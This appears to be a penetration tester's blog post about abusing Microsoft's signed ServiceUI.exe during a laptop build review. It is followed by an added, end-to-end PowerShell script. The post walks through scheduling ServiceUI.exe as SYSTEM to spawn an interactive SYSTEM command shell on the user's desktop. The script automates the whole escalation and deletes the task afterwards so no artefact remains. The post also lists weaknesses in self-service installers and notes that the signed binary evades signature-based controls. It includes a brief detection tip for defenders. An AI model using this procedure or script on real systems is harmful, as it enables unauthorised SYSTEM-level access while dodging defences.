Quite a few months ago I performed a laptop build review: standard stuff, looking for opportunities to escalate privileges and break out of what was supposed to be a secure build.
After reviewing all the common techniques and vulnerabilities, one area I chose to dive into, which proved worthwhile, was Microsoft Software Center, the self-service software installation portal.
Microsoft Software Center allows end users to install software on demand from a pre-approved catalogue and is a common sight in large organisations.
Now, this little post isn’t about the specific vulnerabilities I found whilst reviewing the self-service portal; it’s about a useful little binary I found during that journey which has proved helpful on more than one occasion since. That said, I’ve since reviewed a few self-service portals and each of them has had exploitable vulnerabilities, so they’re definitely an area worth looking into when performing any type of breakout scenario.
Some of the issues I’ve run into include: outdated exploitable software; exploitable software installers/MSIs; PATH variable and DLL sideloading issues; software installing and executing as administrator; installers running from a temp folder with replaceable binaries; and interactive GUI installers running as SYSTEM.
Anyhow, back to the main point of this post: ServiceUI.exe
ServiceUI.exe is a Microsoft-signed binary shipped with the Microsoft Deployment Toolkit. It gets called during the installation process and, when run with the correct options, opens the software installer with SYSTEM privileges inside the current user’s interactive session. Its intended purpose is to let a task sequence or installer running as SYSTEM in session 0 show its window on the logged-on user’s desktop. The process it launches inherits the privileges of whatever started ServiceUI.exe, so to get a SYSTEM process out of it, ServiceUI.exe itself has to be started as SYSTEM; that is what the Task Scheduler step further down is for.
I’m sure you’d all be happy to trust and accept a binary provided by me 🙂 but here’s a link to the Microsoft Deployment Toolkit download, which contains ServiceUI.exe:
Microsoft Deployment Toolkit (MDT)
https://www.microsoft.com/en-us/download/details.aspx?id=54259
Executing ServiceUI.exe from cmd.exe gives the following options.
As a simple test for code execution we can run – serviceui %windir%\notepad.exe
We see that this executes notepad successfully as indicated below.
Now, on the basis that we’ve achieved local administrator privileges and want to gain an interactive SYSTEM shell, we can do this using a number of techniques, Task Scheduler being one of the most straightforward.
Create a New Task and configure it to Run as the SYSTEM user.
Then modify the Actions.
The Program/Script field points at the serviceui.exe binary location, and the arguments need to indicate the session you want your binary to run in and the binary you want to execute.
An easy method for figuring out which session to run in is to run ‘query user‘ from cmd.exe and read the ID column for your (Active) session.
-session:2 c:\windows\system32\cmd.exe
Running the scheduled task then gives us a SYSTEM-privileged command prompt on our own desktop; whoami in that window returns nt authority\system. From a defensive angle it’s worth noting that ServiceUI.exe is legitimately signed, so it won’t trip signature-based controls, and ServiceUI.exe spawning a shell outside of an MDT or ConfigMgr task sequence is a useful thing to alert on.
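The same procedure scripted end to end, as an added example that is not part of the original post: it reads the Active session ID (the same information ‘query user‘ shows), registers a one-shot scheduled task that runs ServiceUI.exe as SYSTEM with the -session argument, starts it, and removes the task again. The ServiceUI.exe path is the default MDT install location, the task name is arbitrary, and the ScheduledTasks cmdlets (Windows 8 / Server 2012 and later) are assumed; none of these are stated on the page. It must be run from an elevated (local administrator) PowerShell prompt.

```powershell
# Added example (not from the original post): scripted version of the
# Task Scheduler steps above. Assumptions not on the page: ServiceUI.exe is at
# the default MDT path below, the ScheduledTasks module is available, and this
# runs from an elevated PowerShell prompt.

$ServiceUI = 'C:\Program Files\Microsoft Deployment Toolkit\Templates\Distribution\Tools\x64\ServiceUI.exe'
$Target    = "$env:windir\System32\cmd.exe"
$TaskName  = 'ServiceUI-SystemShell'   # arbitrary task name (assumed)

if (-not (Test-Path $ServiceUI)) { throw "ServiceUI.exe not found at $ServiceUI" }

# Equivalent of reading the ID column from 'query user': take the session
# marked Active. Falls back to this process's own session ID if the parse
# fails (e.g. localised column headers).
function Get-ActiveSessionId {
    $line = (query user 2>$null) | Where-Object { $_ -match '\s(\d+)\s+Active\s' } | Select-Object -First 1
    if ($line -and $line -match '\s(\d+)\s+Active\s') { return [int]$Matches[1] }
    return (Get-Process -Id $PID).SessionId
}
$SessionId = Get-ActiveSessionId

# Action: serviceui.exe -session:<id> c:\windows\system32\cmd.exe
$Action    = New-ScheduledTaskAction -Execute $ServiceUI -Argument "-session:$SessionId $Target"
# "Run as the SYSTEM user" from the GUI
$Principal = New-ScheduledTaskPrincipal -UserId 'NT AUTHORITY\SYSTEM' -LogonType ServiceAccount -RunLevel Highest
$Settings  = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries

Register-ScheduledTask -TaskName $TaskName -Action $Action -Principal $Principal -Settings $Settings -Force | Out-Null
Start-ScheduledTask -TaskName $TaskName

# Give ServiceUI a moment to spawn the shell, then remove the task so nothing persists.
Start-Sleep -Seconds 3
Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false

# In the new cmd.exe window, 'whoami' should return nt authority\system.
```

The task is deleted straight after it starts because the shell it spawned keeps running on its own; leaving a SYSTEM task behind would be an unnecessary artefact on a client engagement. If ServiceUI.exe is installed elsewhere, change $ServiceUI to match.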